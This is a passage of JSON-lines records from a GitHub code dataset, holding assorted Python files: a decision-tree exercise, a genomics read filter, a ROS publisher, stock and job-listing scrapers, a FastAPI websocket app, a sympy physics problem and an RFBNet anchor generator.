loans\nhome_rent=train[train.home_ownership==0]\nhome_rent_paid=home_rent[home_rent.loan_status==1]\nprob_home_rent_paid=len(home_rent_paid)/len(home_rent)\nprint('prob own rent and paid =',prob_home_rent_paid)\n\n# , the entropy is\n# 0.6040(−0.8172 ln(0.8172) − 0.1828 ln(0.1828))\n# + 0.3960(−0.7529 ln(0.7529) − 0.2471 ln(0.2471)) = 0.7339\n# So the reduction in entropy if we use this feature is 0.7382 − 0.7339 = 0.0043\n\n# exercise 3\n\n# remove target column to create feature only dataset\nX_train = train.drop('loan_status',axis=1)\nX_val=validation.drop('loan_status',axis=1)\nX_test=test.drop('loan_status',axis=1)\n\n\nclf = DecisionTreeClassifier(criterion='entropy',max_depth=4,min_samples_split=1000,min_samples_leaf=200,random_state=0)\nclf = clf.fit(X_train,y_train)\n# fig, ax = plt.subplots(figsize=(40, 30))\n# plot_tree(clf, filled=True, feature_names=X_train.columns, proportion=True)\n# plt.show()\n\ntrain_score=clf.score(X_train,y_train)\ntest_score=clf.score(X_test,y_test)\n\nprint('train_score=',train_score)\nprint('test_score=',test_score)\n","repo_name":"eightsmile/cqf","sub_path":"Module4/Lec6_DecisionTree/CQF_January_2023_M4L6_Solutions-1/loanclub.py","file_name":"loanclub.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"39"}
+{"seq_id":"8971398385","text":"import dr_tools, sys, pysam\nimport os, argparse\nfrom joblib import Parallel, delayed\nsys.path.insert(0, '../src')\nimport GenomeFetch\n\n\"\"\"\nThis script removes reads when 3' has TGG on the genome\nWorks for smallrna star folder. aka max32, max38\n\n>adapter_three_prime\nTGGAATTCTCGGGTGCCAAGG\n>polyA\nAAAAAAAAAAAAA\n\"\"\"\n\ndef safe_mkdir(path):\n\tif not os.path.exists(path):\n\t\tos.mkdir(path)\n\t\tos.chmod(path, 0o774)\n\ndef remove_reads_from_precursor(inbam):\n\n\t\"\"\"\n\tprepare input/output files\n\t\"\"\"\n\tinbamPysamObj = pysam.Samfile(inbam, \"rb\" )\n\tp = inbam.split(\"/\")\n\toutbamTmp = \"/\".join(p[:-3]+[o.outstardir]+p[-2:])\n\tbam_out = \".\".join(outbamTmp.split(\".\")[:-1]) + \"_tmp.bam\"\n\tbam_out_sorted = \".\".join(outbamTmp.split(\".\")[:-1])\n\toutbam = pysam.Samfile(bam_out, \"wb\", template=inbamPysamObj)\n\n\t\"\"\"\n\tcreate genome fetch object\n\t\"\"\"\n\tgf = GenomeFetch.GenomeFetch(genomedir=o.genome_dir)\n\n\t\"\"\"\n\tremove reads when 3' has TGG on the genome\n\t\"\"\"\n\tfor read in inbamPysamObj:\n\t\tread_name = read.qname\n\t\ttid = read.rname\n\t\treadchr = inbamPysamObj.getrname(tid)\n\t\treadstart = int(read.pos) + 1\n\t\treadend = read.aend\n\t\tstrand = read.flag\n\t\treadlen = len(read.seq) #this is the actual read length (41M, means readlen=41)\n\t\tread_len = read.qlen #this only considers matches (8S30M, means read_len=30)\n\t\tminRlen = o.minRlen\n\t\tif readlen <= o.readlen_cutoff:\n\t\t\toutbam.write(read)\n\t\t\tcontinue\n\t\t\n\t\tif strand ==0: #read maps to forward strand\n\t\t\tupperlimit = minRlen - readlen\n\t\t\tbpwindow = gf.get_seq_from_to(readchr, readend+1, readend+upperlimit)\n\t\t\tif readlen==minRlen-1 and (bpwindow == \"T\" or bpwindow == \"A\"): continue #TGGAATTCTCGGGTGCCAAGG\n\t\t\telif readlen==minRlen-2 and (bpwindow == \"TG\" or bpwindow == \"AA\"): continue\n\t\t\telif readlen==minRlen-3 and (bpwindow == \"TGG\" or bpwindow == \"AAA\"): continue\n\t\t\telif readlen==minRlen-4 and (bpwindow == \"TGGA\" or bpwindow == \"AAAA\"): continue\n\t\t\telif readlen==minRlen-5 and (bpwindow == \"TGGAA\" or bpwindow == \"AAAAA\"): continue\n\t\t\telse: outbam.write(read)\n\n\t\telif strand ==16: #read maps to reverse strand\n\t\t\tupperlimit = minRlen - readlen\n\t\t\tbpwindow = gf.get_seq_from_to(readchr, readstart-upperlimit, readstart-1)\n\t\t\tif readlen==minRlen-1 and (bpwindow == \"A\" or bpwindow == \"T\"): continue #TTCCA\n\t\t\telif readlen==minRlen-2 and (bpwindow == \"CA\" or bpwindow == \"TT\"): continue\n\t\t\telif readlen==minRlen-3 and (bpwindow == \"CCA\" or bpwindow == \"TTT\"): continue\n\t\t\telif readlen==minRlen-4 and (bpwindow == \"TCCA\" or bpwindow == \"TTTT\"): continue\n\t\t\telif readlen==minRlen-5 and (bpwindow == \"TTCCA\" or bpwindow == \"TTTTT\"): continue\n\t\t\telse: outbam.write(read)\n\n\toutbam.close()\n\t#sort and index the final bam file\n\tpysam.sort(bam_out, bam_out_sorted)\t\n\tpysam.index(bam_out_sorted+\".bam\", template=inbamPysamObj)\n\tos.remove(bam_out)\n\n#main function\nif '__main__' == __name__:\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('-i', '--instardir', required=True)\n\tparser.add_argument('-o', '--outstardir', required=True)\n\tparser.add_argument('-g', '--genome_dir', default=\"path_to_reference_genome\")\n\tparser.add_argument('-c', '--readlen_cutoff', default=35)\n\tparser.add_argument('-x', '--minRlen', default=41, type=int) #minimum read length to define a precursor\n\tparser.add_argument('-p', 
'--numCPU', default=20, type=int)\n\to = parser.parse_args()\n\n\tif not os.path.exists(o.outstardir): safe_mkdir(o.outstardir)\n\n\tsample_names = os.listdir(o.instardir)\n\tsamplenames_with_fullpath = []\n\tfor sample in sample_names:\n\t\t##prepare input files\n\t\tbam = os.path.join(o.instardir, sample, \"%s.bam\" %sample)\n\t\tsamplenames_with_fullpath.append(bam)\n\n\t\tpath_outbam = os.path.join(o.outstardir, sample)\n\t\tif not os.path.exists(path_outbam): safe_mkdir(path_outbam)\n\n\tParallel(n_jobs=o.numCPU)(delayed(remove_reads_from_precursor)(sample) for sample in samplenames_with_fullpath)\n\n","repo_name":"eyay/smallseq","sub_path":"src/remove_reads_with_genomic_TGG.py","file_name":"remove_reads_with_genomic_TGG.py","file_ext":"py","file_size_in_byte":3805,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"}
+{"seq_id":"43564886608","text":"#!/usr/bin/env python\n#\n# Gets robot state and publishes as tf transform\nimport rospy\nfrom tf2_ros import TFMessage\nfrom sensor_msgs.msg import JointState\nimport argparse\nimport rbd_spot\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Publish Spot RobotState as TF messages\")\n parser.add_argument(\"--root-frame\", type=str, help=\"The name of the root frame of the TF tree\",\n default=\"body\")\n args, _ = parser.parse_known_args()\n\n rospy.init_node(\"spot_state_tf_publisher\")\n conn = rbd_spot.SpotSDKConn(sdk_name=\"StateTFPublisher\")\n robot_state_client = rbd_spot.state.create_client(conn)\n tf_pub = rospy.Publisher('/tf', TFMessage, queue_size=10)\n js_pub = rospy.Publisher('/joint_states', JointState, queue_size=10)\n\n rate = rospy.Rate(10)\n while not rospy.is_shutdown():\n state = rbd_spot.state.getRobotState(robot_state_client)\n tf_msg = rbd_spot.state.get_tf_from_state(state, conn, args.root_frame)\n js_msg = rbd_spot.state.get_joint_state_from_state(state, conn)\n\n tf_pub.publish(tf_msg)\n js_pub.publish(js_msg)\n print(\"published\")\n rate.sleep()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"zkytony/robotdev","sub_path":"spot/ros_ws/src/rbd_spot_robot/scripts/state_publisher.py","file_name":"state_publisher.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"19"}
+{"seq_id":"22866323765","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\n\r\ndef get_bs_obj(company_code):\r\n url = \"https://finance.naver.com/item/main.nhn?code=\" + company_code\r\n result = requests.get(url)\r\n bs_obj = BeautifulSoup(result.content, \"html.parser\")\r\n return bs_obj\r\n\r\n# bs_obj를 받아서 price를 return하게\r\ndef get_price(company_code):\r\n bs_obj = get_bs_obj(company_code)\r\n no_today = bs_obj.find(\"p\", {\"class\": \"no_today\"})\r\n blind_now = no_today.find(\"span\", {\"class\": \"blind\"})\r\n return blind_now.text\r\n\r\n# bs_obj를 받아서 candle_chart_data를 return하게\r\ndef get_candle_chart_data(company_code):\r\n bs_obj = get_bs_obj(company_code)\r\n td_first = bs_obj.find(\"td\", {\"class\":\"first\"})\r\n blind = td_first.find(\"span\", {\"class\":\"blind\"})\r\n\r\n #close 종가(전일)\r\n close = blind.text\r\n\r\n return close\r\n\r\n# samsung 005930\r\n# naver 035420\r\n# kakao 035720\r\ncompany_codes = [\"005930\", \"035420\", \"035720\"]\r\nfor item in company_codes:\r\n price = get_price(item)\r\n close = get_candle_chart_data(item)\r\n print(price, close)\r\n\r\n\r\n\r\n\r\n","repo_name":"ehdalseorka1/crowling","sub_path":"test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"5675295109","text":"#Automation Package\nfrom playwright.sync_api import sync_playwright\nimport time\n#Scraping Package\nfrom selectolax.parser import HTMLParser\nfrom bs4 import BeautifulSoup as bs\n#Preprosscsing Package\nimport pandas as pd\nimport numpy as np\nimport re\nfrom datetime import datetime as dt\nimport json\nimport os\n##################################################\n#Create Automating Page\nwith sync_playwright() as playwright:\n #Launch the browser and go to the page\n browser = playwright.chromium.launch(headless=False , slow_mo=200)\n page = browser.new_page()\n page.set_viewport_size({'width':1920,'height':1080})\n page.goto('https://www.glassdoor.com/Job',wait_until='domcontentloaded')\n\n\n\n #Adjust Resarch Job and Filters\n page.get_by_placeholder('Find your perfect job').type('Data Analyst',delay=200) #Write Data Analyst in job research\n page.locator('div input[value=\"Data Analyst\"]').press('Enter') #Press Enter\n page.wait_for_timeout(2000) # Wait for several milliseconds\n page.locator(\"div[class*='job-search'] input[placeholder='Location']\").type('Remote',delay=200)#Write Remote in location research\n page.locator(\"div[class*='job-search'] input[placeholder='Location']\").press('ArrowDown+Enter')#Press Arrow Down Enter to choose the first result\n page.wait_for_timeout(1000) # Wait for several milliseconds\n page.locator(\"div > [data-test='DATEPOSTED']:visible\").click() #Click in Dateposted to make it visible\n # If Last 3 Days not found\n try:\n page.locator(\"button[value='3']\").click() # Choose the Last 3 Days\n except:\n page.locator(\"button[value='1']\").click() # Choose the last 3 Days\n page.wait_for_timeout(1000) # # Wait for several milliseconds\n page.locator(\"div [data-test='sort-by-header']:visible\").click()# Make sort header visible\n page.wait_for_timeout(1000) # # Wait for several milliseconds\n page.get_by_role('button',name='Recent').click() # Sort by recent res\n\n page.wait_for_selector(\"li[class*='react-job-listing']\") # Wait for selector\n \n def iter_each_job(Jobs):\n '''\n This function take all 30 jobs in the page and loop\n for each one of them to extract more info about each job\n like job_description , salray , about the company and more\n finaly store the result in the genrator to loop on it in another time\n '''\n for i in range(len(Jobs)):\n page.locator(\"li[class*='react-job-listing']\").all()[i].click()\n page.wait_for_timeout(2000)# Wait for several milliseconds\n if page.locator(\"div[class*='actionBar'] > button\").count() == 1:# Check if there is register page\n page.locator(\"div[class*='actionBar'] > button\").click() # Close the register page\n page.wait_for_selector(\"article[class*='scrollable active']\") # Wait untile the selector load\n page.get_by_text('Show More').first.click() # Show job description\n page.wait_for_timeout(200)# Wait for several milliseconds\n yield page.inner_html('body') \n else: \n page.wait_for_selector(\"article[class*='scrollable active']\") # Wait untile the selector load\n page.get_by_text('Show More').first.click() # Show job description\n page.wait_for_timeout(200)# Wait for several milliseconds\n yield page.inner_html('body')\n\n\n # html_bodies = iter_each_job(page.locator(\"li[class*='react-job-listing']\").all()) \n\n def scrape_data(body):\n '''\n This function works to store the data in json list of dict\n first loop over all right continer jobs in the page to\n just get the job title , company title ,location and date posted\n from the main body of 
html\n '''\n \n html = HTMLParser(body) # parse the the body of html page to dealing with it using css selector\n df=[{\n 'Job_Title':title.text(),#Extract the Job Title\n 'Company_Title':re.sub(r'[^A-z]',' ',company.text()).strip(), # Substract all anything except string than get the string\n 'Location':location.text(),#Extract the Location of the company\n 'Date_Posted':dt.strftime(dt.now() - pd.Timedelta(value= int(re.findall(r'\\d',date_posted.text())[0]), unit='D'),'%Y-%m-%d') if re.findall(r'[A-z]',date_posted.text())[0].lower() != 'h' else dt.strftime(dt.now(),'%Y-%m-%d'),\n } # if the date posted is 24h i'll return the today's day in date formating else the date posted like 5d i'll substract 5 days from today's date and return it in formating date \n for title ,company ,location, date_posted in zip(html.css(\"div [class*='job-title']\"),html.css(\"div [id*=job-employer]\"),html.css(\"div[class*='location mt-xxsm']\"),html.css(\"div [data-test='job-age']\"))] \n \n # Loop for each job to get the job describtion and more info about the company\n df_desc = []\n for job in iter_each_job(page.locator(\"li[class*='react-job-listing']\").all()):\n html_desc = HTMLParser(job) # parse the first html of the job desc\n if len(html_desc.css(\"#CompanyContainer\")) != 0 : # Check if there is a comany over view container\n company_over_view = {company_overview_matric.text().lower():company_overview_value.text().lower() for company_overview_matric,company_overview_value in zip(html_desc.css(\"#CompanyContainer div span[class*='1taruhi']\"),html_desc.css(\"#CompanyContainer div span[class*='i9gxme']\"))} \n df_desc.append(# First, I have to iterate on the key and the value for each container I did a dictionary because there are some jobs that have incomplete information and without order\n {'Size' : company_over_view['size'] if 'size' in company_over_view.keys() else np.NaN,\n 'Founded' : int(company_over_view['founded']) if 'founded' in company_over_view.keys() else np.NaN,\n 'Type' : company_over_view['type'] if 'type' in company_over_view.keys() else np.NaN,\n 'Industry' : company_over_view['industry'] if 'industry' in company_over_view.keys() else np.NaN,\n 'Sector' : company_over_view['sector'] if 'sector' in company_over_view.keys() else np.NaN,\n 'Revenue' : company_over_view['revenue'] if 'revenue' in company_over_view.keys() else np.NaN,\n 'Average_Salary':page.locator(\"div [class*='7rpujz']\").inner_text() if len(html_desc.css(\"div [class*='salaryTab']\")) != 0 else np.NaN,\n 'Estimate_Salary':page.locator(\"div [class*='1d4p0fd']\").first.inner_text() +\" to \"+ page.locator(\"div [class*='1d4p0fd']\").last.inner_text() if len(html_desc.css(\"div [class*='salaryTab']\")) != 0 else np.NaN,\n 'Job_Description': page.locator(\"div [class*='jobDescriptionContent']\").inner_text() if len(html_desc.css(\"div [class*='jobDescriptionContent']\")) != 0 else np.NaN}\n )\n else: # If the comany over view container fill all the data with null values\n df_desc.append(\n {'Size' : np.NaN,\n 'Founded' : np.NaN,\n 'Type' : np.NaN,\n 'Industry' : np.NaN,\n 'Sector' : np.NaN,\n 'Revenue' : np.NaN,\n 'Average_Salary':page.locator(\"div [class*='7rpujz']\").inner_text() if len(html_desc.css(\"div [class*='salaryTab']\")) != 0 else np.NaN,\n 'Estimate_Salary':page.locator(\"div [class*='1d4p0fd']\").first.inner_text() +\" to \"+ page.locator(\"div [class*='1d4p0fd']\").last.inner_text() if len(html_desc.css(\"div [class*='salaryTab']\")) != 0 else np.NaN,\n 'Job_Description': page.locator(\"div 
[class*='jobDescriptionContent']\").inner_text() if len(html_desc.css(\"div [class*='jobDescriptionContent']\")) != 0 else np.NaN}\n )\n\n # #Update the dictionaries with each other\n for z , zz in zip(df , df_desc):\n z.update(zz)\n Data_Frame = df\n \n\n return Data_Frame\n \n\n def Create_newfile(your_filename):\n # Check If the file is exists if not create new one\n '''\n This function take your file name to create a new file if\n the file dosen't exists and if not remove the exists file\n which's contains the old data and create new one that \n will has the new data in it\n '''\n if os.path.exists(your_filename) :\n os.remove(your_filename)\n open(your_filename,'w').close()\n else:\n open(your_filename,'w').close()\n\n Create_newfile('Glassdoor.json')\n \n\n # Write data into json file\n def write_json(data , filename):\n '''\n This function takes the data that you wanna write\n and the file name and it'll automatice write the data\n and close the file \n '''\n with open(filename , 'w') as file: \n json.dump(data , file,indent=4)\n file.close()\n\n def append_new_data(new_data , filename):\n '''\n this function takes the new data that you wanna append to\n the json file and the file name and\n '''\n # first read the json file to load the old data\n with open(filename,'r') as file:\n old_data = json.load(file)\n for data in new_data:\n old_data.append(data) # loop through list of dict to append each dict \n all_data = old_data\n write_json(all_data,filename)# now update the json file by writing all data \n file.close()\n \n\n num_pages = int(page.locator(\"div[class='paginationFooter']\").inner_text().split(' ')[-1]) # Extract the number of pages \n counter = 0\n while counter < num_pages: # Loop for number of pages \n \n if page.locator(\"div[class*='actionBar'] > button\").count() == 1: # Check if there is register page\n page.locator(\"div[class*='actionBar'] > button\").click() # Close the register page\n\n # else: # there is no register page\n data = scrape_data(page.inner_html('body')) # Extract the body of the page\n\n # Store The Data in json file\n #Using try and except to avoid the error which will happen because the empty file\n try:\n append_new_data(data , 'Glassdoor.json')#Second, the function will append the new data, and the first time the file will be empty of course I got an error so I should use the write function first to write the data\n except: \n write_json(data , 'Glassdoor.json')#Third for only the first time I gonna use the right function directly but then I gonna use it from the append function to write the new data \n\n if counter > 0 and page.locator('button[disabled]').count() == 1:# th break the last page\n break\n\n page.get_by_role('button',name='Next').click() # Move to the next page\n page.wait_for_selector(\"li[class*='react-job-listing']\") # Wait untile the selector load\n \n page.wait_for_timeout(3000) # # Wait for several milliseconds \n \n counter += 1\n\n page.close()\n \n\n","repo_name":"bhr100/Data-Analyst-Jobs","sub_path":"Jobs-Scraper.py","file_name":"Jobs-Scraper.py","file_ext":"py","file_size_in_byte":11342,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"70341084204","text":"from collections import defaultdict\n\n\nclass UndergroundSystem:\n\n def __init__(self):\n self.journey = defaultdict()\n self.history = defaultdict()\n \n def checkIn(self, id: int, startStation: str, t: int) -> None:\n self.journey[id] = (startStation, t)\n \n\n def checkOut(self, id: int, endStation: str, endTime: int) -> None:\n startStation, startTime = self.journey.pop(id)\n key = (startStation, endStation)\n allTime, allCount = self.history.get(key, (0, 0))\n self.history[key] = (allTime + (endTime - startTime), allCount + 1)\n \n def getAverageTime(self, startStation: str, endStation: str) -> float:\n key = (startStation, endStation)\n allTime, allCount = self.history.get(key, (0, 0))\n return allTime / allCount\n\n\n# Your UndergroundSystem object will be instantiated and called as such:\nobj = UndergroundSystem()\nobj.checkIn(1, \"dhaka\", 23)\nobj.checkOut(1, \"kishoreganj\", 30)\nt = obj.getAverageTime(\"dhaka\", \"kishoreganj\")\nprint(t)","repo_name":"fkshohag/All-algorithm","sub_path":"Online-judge/leetcode/design-underground-system.py","file_name":"design-underground-system.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"}
+{"seq_id":"27402002697","text":"import moviepy.editor as mpy\nimport gizeh as gz\n\nVIDEO_SIZE = (1920, 1080)\nWHITE = (255, 255, 255)\nDURATION = 5\nKIDS_PIC = \"./assets/cyberscooty-two-kids.png\"\nTEACHER_PIC = \"./assets/teacher.png\"\n\nif __name__ == '__main__':\n kids_pic = mpy.ImageClip(KIDS_PIC). \\\n set_position((15,900)).resize(width=200)\n\n teacher_pic = mpy.ImageClip(KIDS_PIC). \\\n set_position((1900,900)).resize(width=200)\n\n video = mpy.CompositeVideoClip(\n [\n kids_pic,\n teacher_pic\n ],\n size=VIDEO_SIZE).\\\n on_color(\n color=WHITE,\n col_opacity=1).set_duration(DURATION)\n\n video.write_videofile('sample.mp4', fps=10)\n","repo_name":"nishantnischaya/YoutubeAutogenerated","sub_path":"test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"35501826900","text":"from sympy import symbols, diff, Function, pi, dsolve, solve, integrate\n\nheight = 30e-2\nd_1 = 8.2e-2\nd_2 = 13e-2\nt_1 = 20\nt_2 = 520\nlambda_ = 100\n\nA = Function('A')\nt = symbols('t')\nPhi = symbols('Phi')\ny = symbols('y')\n\neq1 = diff(A(y), y, 2)\nA = solve(dsolve(eq1, ics={A(0): pi/4*d_2**2, A(height): pi/4*d_1**2}), A(y))[0]\n# Phi = -lambda_*A*diff(t, y)\nresult1 = integrate(-1/(lambda_ * A), (y, 0, height))\nresult2 = integrate(1, (t, t_2, t_1))\nPhi = result2 / result1\nprint(f'Phi = {Phi:.2f} W')\n","repo_name":"hustquick/HeatTransfer","sub_path":"Problems/pr02-30.py","file_name":"pr02-30.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"}
+{"seq_id":"22630954220","text":"# Written by Arno Bakker \n# see LICENSE.txt for license information\n\nfrom threading import currentThread\n\nfrom Tribler.Core.API import *\nfrom Tribler.Video.VideoServer import VideoHTTPServer\n\n\ndef state_callback(d,ds):\n print >>sys.stderr,\"main: Stats\",dlstatus_strings[ds.get_status()],ds.get_progress(),\"%\",ds.get_error()\n\ndef vod_ready_callback(d,event,params):\n print >>sys.stderr,\"main: VOD ready callback called\",currentThread().getName(),\"###########################################################\",params[\"mimetype\"]\n\n \"\"\"\n f = open(\"video.avi\",\"wb\")\n while True:\n data = stream.read()\n print >>sys.stderr,\"main: VOD ready callback: reading\",type(data)\n print >>sys.stderr,\"main: VOD ready callback: reading\",len(data)\n if len(data) == 0:\n break\n f.write(data)\n f.close()\n stream.close()\n \"\"\"\n\n videoserv = VideoHTTPServer.getInstance()\n videoserv.set_inputstream('video/mpeg',params[\"stream\"],None)\n \n\nif __name__ == \"__main__\":\n \n videoserv = VideoHTTPServer.getInstance() # create\n videoserv.background_serve()\n \n s = Session()\n \n if sys.platform == 'win32':\n tdef = TorrentDef.load('bla.torrent')\n else:\n tdef = TorrentDef.load('/tmp/bla.torrent')\n dcfg = DownloadStartupConfig.get_copy_of_default()\n #dcfg.set_saveas('/arno')\n dcfg = DownloadStartupConfig.get_copy_of_default()\n dcfg.set_video_start_callback(vod_ready_callback)\n #dcfg.set_selected_files('MATRIX-XP_engl_L.avi') # play this video\n #dcfg.set_selected_files('field-trip-west-siberia.avi')\n \n d = s.start_download(tdef,dcfg)\n d.set_state_callback(state_callback,1)\n #d.set_max_upload(100)\n \n time.sleep(10)\n \n \"\"\" \n d.stop()\n print \"After stop\"\n time.sleep(5)\n d.restart()\n \"\"\"\n time.sleep(2500)\n \n","repo_name":"csko/Tribler-gossip","sub_path":"Tribler/Test/API/test_vod.py","file_name":"test_vod.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"19"}
+{"seq_id":"32934264937","text":"from typing import List\n\nimport uvicorn\nfrom fastapi import Depends\nfrom starlette.concurrency import run_until_first_complete\nfrom starlette.websockets import WebSocket\n\nfrom app import app, broadcast\nfrom auth import get_user_from_token\nfrom dependencies import get_user_repository, get_rooms_repo\nfrom schema import RoomDTO\n\n\n@app.get(\"/api/rooms\", response_model=List[RoomDTO])\nasync def get_rooms(\n user=Depends(get_user_from_token),\n rooms_repository=Depends(get_rooms_repo),\n repository=Depends(get_user_repository)\n):\n user = repository.get_by_login(login=user)\n if not user:\n raise Exception()\n return await rooms_repository.get_all()\n\n\nasync def events_ws_receiver(websocket, channel: str):\n async for message in websocket.iter_text():\n await broadcast.publish(channel=channel, message=message)\n\n\nasync def events_ws_sender(websocket, channel: str):\n async with broadcast.subscribe(channel=channel) as subscriber:\n async for event in subscriber:\n await websocket.send_text(event.message)\n\n\n@app.websocket(\"/{channel_id}\")\nasync def websocket_endpoint(websocket: WebSocket, channel_id: str):\n await websocket.accept()\n await run_until_first_complete(\n (events_ws_receiver, {\"websocket\": websocket, \"channel\": channel_id}),\n (events_ws_sender, {\"websocket\": websocket, \"channel\": channel_id}),\n )\n\n\nif __name__ == \"__main__\":\n uvicorn.run(app, host=\"0.0.0.0\", port=8000)\n","repo_name":"StephanYorchenko/health-manager-back","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"71283613165","text":"#%%\ndef openInput():\n with open('input.txt') as f:\n return f.read()\n\nclass House():\n def __init__(self, x, y) -> None:\n self.x = x\n self.y = y\n self.gifts = 0\n \n def addGift(self):\n self.gifts += 1\n\nclass Houses():\n def __init__(self) -> None:\n self.houses: list[House] = []\n\n def addHouse(self, house: House):\n self.houses.append(house)\n\n def getHouse(self, x, y) -> bool:\n for house in self.houses:\n if house.x == x and house.y == y:\n return house\n new_house = House(x,y)\n self.houses.append(new_house)\n return new_house\n\ndef move(x, y, cmd):\n if cmd == '<':\n x -= 1\n elif cmd == '>':\n x += 1\n elif cmd == '^':\n y += 1\n elif cmd == 'v':\n y -= 1\n return x, y\n\n\nline = openInput()\nhouses = Houses()\n\n# first house\nx, y = 0, 0\nhouse = houses.getHouse(x,y)\nhouse.addGift()\n\n# the rest\nfor cmd in line:\n x, y = move(x, y, cmd)\n house = houses.getHouse(x,y)\n house.addGift()\n # print(f'added gift at {x=}, {y=}')\n\nprint(len(houses.houses))\n\n# %%\n","repo_name":"jrkell/advent-of-code","sub_path":"2015/day-3/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"12313997145","text":"import torch\nimport torch.nn as nn\nimport torch.backends.cudnn as cudnn\nfrom math import sqrt as sqrt\nfrom itertools import product as product\n\n\nclass PriorBox(object):\n \"\"\"Compute priorbox coordinates in center-offset form for each source\n feature map.生成feature map上预定义的anchor box\n Note:\n This 'layer' has changed between versions of the original SSD\n paper, so we include both versions, but note v2 is the most tested and most\n recent version of the paper.\n\n \"\"\"\n def __init__(self, cfg):\n super(PriorBox, self).__init__()\n self.image_size = cfg['min_dim'] # 输入RFBNet的图像尺度,这里假设512\n # number of priors for feature map location (300有6个,而512有7个feature map)\n self.num_priors = len(cfg['aspect_ratios']) # 各个feature map上预定义的anchor长宽比清单,与检测分支的数量对应\n self.variance = cfg['variance'] or [0.1]\n self.feature_maps = cfg['feature_maps'] # 特征金字塔层上各个feature map尺度\n self.min_sizes = cfg['min_sizes'] # 预定义的anchor尺度���短边,越深层感受野越大故分配的anchor尺度越大\n # SSD中6个default bbox如何定义的?2:1 + 1:2 + 1:3 + 3:1+两个1:1长宽比的anchor,\n # 但SSD定义了一个根号2尺度的anchor,max_sizes类似,但并不是严格对应的\n self.max_sizes = cfg['max_sizes'] # 预定义的anchor尺度的长边\n self.steps = cfg['steps'] # 每个尺度检测特征图分支的stride(即与输入的缩小倍数)\n self.aspect_ratios = cfg['aspect_ratios'] # feature map上每个pix上预定义6/7个anchor\n self.clip = cfg['clip'] # 位置校验\n for v in self.variance:\n if v <= 0:\n raise ValueError('Variances must be greater than 0')\n\n def forward(self):\n mean = [] # 用于保存所有feature map上预定义的anchor\n for k, f in enumerate(self.feature_maps): #对特征金字塔的各个检测分支,每个feature map上each-pixel都做密集anchor采样\n for i, j in product(range(f), repeat=2): # 笛卡尔积repeat后的f,组成很多二维元组,可以开始密集anchor采样了\n f_k = self.image_size / self.steps[k] #当前检测分支的特征图大小\n cx = (j + 0.5) / f_k #当前检测分支的归一化后的anchor中心坐标cx\n cy = (i + 0.5) / f_k # 以上三步操作,就相当于从feature map位置映射至归一化原图,float型\n\n\n s_k = self.min_sizes[k]/self.image_size #归一化后的当前检测分支对应的anchor的min_size\n mean += [cx, cy, s_k, s_k] # 第一个anchor添加,1:1长宽比\n\n # aspect_ratio: 1\n # rel size: sqrt(s_k * s_(k+1))\n s_k_prime = sqrt(s_k * (self.max_sizes[k]/self.image_size)) #sqrt(min_sizes[k]*max_sizes[k]/(512*512))\n mean += [cx, cy, s_k_prime, s_k_prime]# 第二个anchor添加,1:1长宽比,尺度与第一个anchor不一样,和SSD对应上了~~~\n\n # rest of aspect ratios\n for ar in self.aspect_ratios[k]:#不管是[2]还是[2,3]都循环当前aspect_ratio内部元素\n mean += [cx, cy, s_k*sqrt(ar), s_k/sqrt(ar)]# 如是[2,3],生成2:1和3:1的anchor,如是[2]则生成2:1的anchor\n mean += [cx, cy, s_k/sqrt(ar), s_k*sqrt(ar)]# 如是[2,3],生成1:2和1:3,如是[2],生成1:2的anchor\n\n # 总结:\n # 1 每个检测分支feature map上each-pixel对应6 / 7个anchor,长宽比:2:1 + 1:2 + 1:3 + 3:1 + 1:1 + 1:1,后两个1:1的anchor对应的尺度有差异;\n # 2 跟SSD还是严格对应的,每个feature map上anchor尺度唯一(2:1 + 1:2 + 1:3 + 3:1 + 1:1这五个anchor的尺度还是相等的,面积相等),仅最后的1:1 anchor尺度大一点;\n # 3 所有feature map上所有预定义的不同尺度、长宽比的anchor保存至mean中;\n\n # back to torch land\n output = torch.Tensor(mean).view(-1, 4) # 操作类似reshape,规则化输出\n if self.clip:\n output.clamp_(max=1, min=0)# float型坐标校验\n return output\n","repo_name":"2585157341/RFBNet-master_Chinese_note","sub_path":"layers/functions/prior_box.py","file_name":"prior_box.py","file_ext":"py","file_size_in_byte":4248,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"19"}
